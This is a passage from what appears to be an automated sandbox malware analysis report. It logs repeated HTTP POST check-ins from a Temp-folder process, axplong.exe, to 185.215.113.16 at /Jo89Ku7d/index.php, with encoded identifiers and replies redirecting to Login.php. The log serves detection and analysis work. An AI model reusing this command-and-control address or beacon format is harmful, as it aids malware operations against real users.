                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:13.733561039 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:13 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                9192.168.2.449759185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:13.853938103 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:14.569432974 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:14 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:14.570529938 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:14.803164005 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:14 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                10192.168.2.449762185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:14.916593075 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:15.610800028 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:15 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:15.611680984 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:15.839762926 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:15 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                11192.168.2.449765185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:15.963418007 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:16.663414001 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:16 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:16.759260893 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:16.987288952 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:16 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                12192.168.2.449766185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:17.374164104 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:18.096131086 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:17 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:18.098745108 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:18.329432011 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:18 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                13192.168.2.449769185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:18.448019028 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:19.162811041 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:19 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:19.163757086 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:19.395610094 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:19 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                14192.168.2.449772185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:19.691888094 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:20.351269007 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:20 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:20.352669954 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:20.780484915 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:20 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                15192.168.2.449775185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:20.907125950 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:21.764983892 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:21 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:21.766148090 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:22.024318933 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:21 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                16192.168.2.449778185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:22.202411890 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:22.946219921 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:22 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:22.947155952 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:23.208220959 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:23 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                17192.168.2.449781185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:23.334587097 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:24.577430964 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:24 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:24.578175068 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:24.579973936 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:24 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:24.816307068 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
